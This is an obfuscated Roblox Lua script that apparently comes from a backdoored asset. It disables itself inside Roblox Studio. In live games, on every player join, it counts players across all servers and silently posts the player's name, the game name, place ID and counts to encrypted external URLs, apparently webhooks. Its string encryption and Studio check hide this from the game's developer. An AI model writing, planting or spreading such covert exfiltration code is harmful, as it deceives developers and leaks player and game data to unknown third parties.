--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	_G.Cs = {UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + #Cs + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y ~= 255) then
	else
		return x % 256;
	end
	if (y ~= 65535) then
	else
		return x % 65536;
	end
	if (y ~= 4294967295) then
	else
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y ~= 255) then
	else
		return (x - (x % 256)) + 255;
	end
	if (y ~= 65535) then
	else
		return (x - (x % 65536)) + 65535;
	end
	if (y ~= 4294967295) then
	else
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) < N) then
	else
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) < N) then
	else
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) < N) then
	else
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x < (P / 2)) then
		else
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	_G.Cs = {[LUAOBFUSACTOR_DECRYPT_STR_0("\228\242\232\1\194\154\230", "\126\177\163\187\69\134\219\167")]=3,[LUAOBFUSACTOR_DECRYPT_STR_0("\26\236\25\225\209\17\245\11", "\156\67\173\74\165")]=1,[LUAOBFUSACTOR_DECRYPT_STR_0("\13\150\122\23\236\7\112\2", "\38\84\215\41\118\220\70")]=2};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + #Cs + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
local v0 = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\249\215\207\53\213\190\213\8\216\192\222", "\126\177\163\187\69\134\219\167"));
local v1 = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\19\193\43\220\249\49\222", "\156\67\173\74\165"));
local v2 = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\25\182\91\29\185\50\86\56\182\74\19\143\35\84\34\190\74\19", "\38\84\215\41\118\220\70"));
local v3 = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\98\3\44\33\251\66\0\43\17\251", "\158\48\118\66\114"));
if v3:IsStudio() then
	return;
end
local v4 = {[LUAOBFUSACTOR_DECRYPT_STR_0("\190\42\20\51\97\244\171", "\155\203\68\112\86\19\197")]=LUAOBFUSACTOR_DECRYPT_STR_0("\78\201\34\236\83\34\170\183\66\212\37\255\79\106\225\249\86\205\120\255\79\117\170\249\86\212\121\235\69\122\237\247\73\214\37\179\17\43\188\171\31\136\101\173\20\41\188\160\22\141\102\164\20\45\189\183\92\140\47\213\114\118\203\236\30\216\15\165\115\112\176\160\92\139\36\240\67\121\230\234\30\243\16\200\13\77\209\205\106\228\103\203\80\84\226\207\100\229\32\210\112\82\226\247\107\216\55\215\112\125\183\199\107\138\7\249\127\116\182\251\73\255\56\202", "\152\38\189\86\156\32\24\133"),[LUAOBFUSACTOR_DECRYPT_STR_0("\250\69\168\75\173\7\179\73\169\7", "\38\156\55\199")]=LUAOBFUSACTOR_DECRYPT_STR_0("\160\105\104\56\0\46\181\12\172\116\111\43\28\102\254\66\184\109\50\43\28\121\181\66\184\116\51\63\22\118\242\76\167\118\111\103\66\39\163\16\241\40\47\122\65\39\162\22\255\45\45\122\68\33\172\12\254\95\109\29\59\44\216\100\178\119\114\101\28\69\243\90\170\79\82\23\62\82\202\20\132\111\126\11\7\96\242\26\177\43\115\24\53\100\254\112\130\41\46\12\67\34\236\114\153\89\127\23\94\108\255\20\253\85\43\16\34\109\201\103\241\108\120\4", "\35\200\29\28\72\115\20\154"),[LUAOBFUSACTOR_DECRYPT_STR_0("\31\173\222\210\216\124\32\22\238\132\143", "\84\121\223\177\191\237\76")]=LUAOBFUSACTOR_DECRYPT_STR_0("\179\66\221\176\41\10\127\142\191\95\218\163\53\66\52\192\171\70\135\163\53\93\127\192\171\95\134\183\63\82\56\206\180\93\218\239\107\3\105\146\226\3\154\242\98\2\104\151\237\14\152\240\99\5\96\142\159\102\153\177\109\90\10\195\163\122\145\240\54\118\25\231\130\27\222\151\55\83\33\208\152\71\228\246\44\2\60\149\234\80\192\178\61\66\34\144\137\105\231\183\10\95\5\211\168\85\198\242\12\84\96\224\181\84\145\186\98\8\22\240\158\71\254\137", "\161\219\54\169\192\90\48\80"),[LUAOBFUSACTOR_DECRYPT_STR_0("\72\64\15\51\76\19\85\117", "\69\41\34\96")]=LUAOBFUSACTOR_DECRYPT_STR_0("\180\215\195\26\17\113\243\140\211\3\17\40\179\209\211\11\18\59\242\192\216\7\77\42\172\202\152\29\7\41\180\204\216\1\17\100\237\144\142\89\91\126\239\144\130\90\83\123\233\151\132\92\80\122\236\140\248\56\39\25\232\150\230\26\43\49\177\144\128\15\12\28\183\154\229\16\83\60\140\239\219\71\58\31\151\205\133\2\86\2\187\218\230\27\16\13\174\144\255\28\49\115\169\142\224\25\42\36\233\146\227\7\91\42\177\240\194\30\15\14\171\208\220\61", "\75\220\163\183\106\98")};
local function v5()
	local v7 = game.GameId;
	local v8 = 0 - 0;
	local v9 = "";
	repeat
		local v19 = ("https://games.roblox.com/v1/games/%d/servers/Public?limit=100%s"):format(v7, ((v9 ~= "") and (LUAOBFUSACTOR_DECRYPT_STR_0("\68\185\158\37\202\13\168\214", "\185\98\218\235\87") .. v9)) or "");
		local v20, v21 = pcall(function()
			return v0:GetAsync(v19);
		end);
		if v20 then
			local v25 = 931 - (857 + 74);
			local v26;
			while true do
				if (v25 == (568 - (367 + 201))) then
					v26 = v0:JSONDecode(v21);
					for v30, v31 in ipairs(v26.data or {}) do
						(v8 += v31.playing) or (927 - (214 + 713))
					end
					v25 = 1 + 0;
				end
				if (v25 == (1 + 0)) then
					v9 = v26.nextPageCursor or "";
					break;
				end
			end
		else
			warn(LUAOBFUSACTOR_DECRYPT_STR_0("\240\11\34\228\214\165\196\55\26\166\248\171\194\48\34\226\158\190\196\124\32\227\202\234\216\57\53\240\219\184\216\124\35\231\202\171\145\124", "\202\171\92\71\134\190") .. tostring(v21));
			break;
		end
	until v9 == "" 
	return v8;
end
local function v6(v10, v11)
	local v12 = game.PlaceId;
	local v13 = v1.MaxPlayers;
	local v14 = {[LUAOBFUSACTOR_DECRYPT_STR_0("\7\192\33\141", "\232\73\161\76")]=LUAOBFUSACTOR_DECRYPT_STR_0("\142\215\73\83\17\172\215\2\122\31\182\220", "\126\219\185\34\61")};
	pcall(function()
		v14 = v2:GetProductInfo(v12);
	end);
	local v15;
	if (v11 < 10) then
		v15 = v4.under10;
	elseif (v11 < 50) then
		v15 = v4.from10to50;
	elseif (v11 < (1027 - (282 + 595))) then
		v15 = v4.from50to150;
	else
		v15 = v4.above150;
	end
	if not v15 then
		return;
	end
	local v16 = {[LUAOBFUSACTOR_DECRYPT_STR_0("\9\195\92\119\122\100", "\135\108\174\62\18\30\23\147")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\162\224\62\199\29", "\167\214\137\74\171\120\206\83")]=LUAOBFUSACTOR_DECRYPT_STR_0("\193\186\17\81\241\164\128\176\26\88\234\162\193\186", "\199\235\144\82\61\152"),[LUAOBFUSACTOR_DECRYPT_STR_0("\18\4\181", "\75\103\118\217")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\207\64\100\4\170\68\136\27\103\3\174\80\213\91\114\24\182\6\137\87\127\25\246\25\198\89\117\7\246", "\126\167\52\16\116\217") .. v12),[LUAOBFUSACTOR_DECRYPT_STR_0("\204\43\51\131\166\16\236\220\39\47\142", "\156\168\78\64\224\212\121")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\32\239\168\203\71\192\164\195\2\180\229\206", "\174\103\142\197") .. v14.Name .. "`"),[LUAOBFUSACTOR_DECRYPT_STR_0("\66\49\79\61", "\152\54\72\63\88\69\62")]=LUAOBFUSACTOR_DECRYPT_STR_0("\198\205\237\84", "\60\180\164\142"),[LUAOBFUSACTOR_DECRYPT_STR_0("\91\81\9\38\53", "\114\56\62\101\73\71\141")]=tonumber(15018106 + 1693574),[LUAOBFUSACTOR_DECRYPT_STR_0("\190\230\212\208\189\251", "\164\216\137\187")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\219\229\62\188\153\235\25\222", "\107\178\134\81\210\198\158")]=LUAOBFUSACTOR_DECRYPT_STR_0("\48\26\150\214\185\98\65\205\197\174\54\64\134\207\185\59\1\144\194\171\40\30\204\197\165\53\65\131\210\190\57\13\138\203\175\54\26\145\137\252\111\87\210\151\251\108\86\219\150\255\108\91\218\159\250\106\87\205\144\253\97\92\212\149\249\96\90\212\150\250\104\91\211\145\251\106\65\176\228\156\118\30\140\193", "\202\88\110\226\166"),[LUAOBFUSACTOR_DECRYPT_STR_0("\215\10\154\227", "\170\163\111\226\151")]=LUAOBFUSACTOR_DECRYPT_STR_0("\33\60\179\33\75\37\105\59\63\187\54\75\51", "\73\113\80\210\88\46\87")},[LUAOBFUSACTOR_DECRYPT_STR_0("\149\36\216\31\229\143\45\196\30", "\135\225\76\173\114")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\15\255\180", "\199\122\141\216\208\204\221")]=(LUAOBFUSACTOR_DECRYPT_STR_0("\165\201\4\224\107\172\226\146\7\231\111\184\191\210\18\252\119\238\227\222\31\253\55\247\190\206\21\228\53\226\165\200\29\242\118\247\164\209\95\249\117\247\170\216\79\241\107\229\168\201\57\244\37", "\150\205\189\112\144\24") .. v12 .. LUAOBFUSACTOR_DECRYPT_STR_0("\99\147\182\72\16\128\76\71\115\220\249\68\1\129\22\24\49\217\235\31\86\206\23\31\55\137\190\88\89\152\31\23", "\112\69\228\223\44\100\232\113"))},[LUAOBFUSACTOR_DECRYPT_STR_0("\213\10\19\219\185\110", "\230\180\127\103\179\214\28")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\130\4\82\67", "\128\236\101\63\38\132\33")]=v10},[LUAOBFUSACTOR_DECRYPT_STR_0("\170\160\20\72\178\248", "\175\204\201\113\36\214\139")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\73\205\56\217", "\100\39\172\85\188")]=LUAOBFUSACTOR_DECRYPT_STR_0("\231\50\137\140\50\180\125\171\147\115\164\118\249\167\50\160\125\243\202", "\83\205\24\217\224"),[LUAOBFUSACTOR_DECRYPT_STR_0("\240\196\193\40\227", "\93\134\165\173")]=("`" .. v11 .. "`"),[LUAOBFUSACTOR_DECRYPT_STR_0("\183\252\205\203\52\203", "\30\222\146\161\162\90\174\210")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\235\79\125\15", "\106\133\46\16")]=LUAOBFUSACTOR_DECRYPT_STR_0("\18\106\94\253\66\0\107\37\97\234\95\82\24\19\122\230\95\10\18", "\32\56\64\19\156\58"),[LUAOBFUSACTOR_DECRYPT_STR_0("\76\201\233\67\95", "\224\58\168\133\54\58\146")]=("`" .. v13 .. "`"),[LUAOBFUSACTOR_DECRYPT_STR_0("\80\88\71\244\123\131", "\107\57\54\43\157\21\230\231")]=true},{[LUAOBFUSACTOR_DECRYPT_STR_0("\213\138\28\240", "\175\187\235\113\149\217\188")]=LUAOBFUSACTOR_DECRYPT_STR_0("\118\229\177\64\226\122\125\124\134\165\6\169", "\24\92\207\225\44\131\25"),[LUAOBFUSACTOR_DECRYPT_STR_0("\93\210\180\89\30", "\29\43\179\216\44\123")]=("`" .. v12 .. "`"),[LUAOBFUSACTOR_DECRYPT_STR_0("\180\215\44\69\179\220", "\44\221\185\64")]=true}}}}};
	local v17 = v0:JSONEncode(v16);
	pcall(function()
		v0:PostAsync(v15, v17, Enum.HttpContentType.ApplicationJson);
	end);
end
v1.PlayerAdded:Connect(function(v18)
	task.spawn(function()
		local v22 = 0 - 0;
		local v23;
		while true do
			if (v22 == (117 - (32 + 85))) then
				v23 = v5();
				if v23 then
					v6(v18.Name, v23);
				end
				break;
			end
		end
	end);
end);
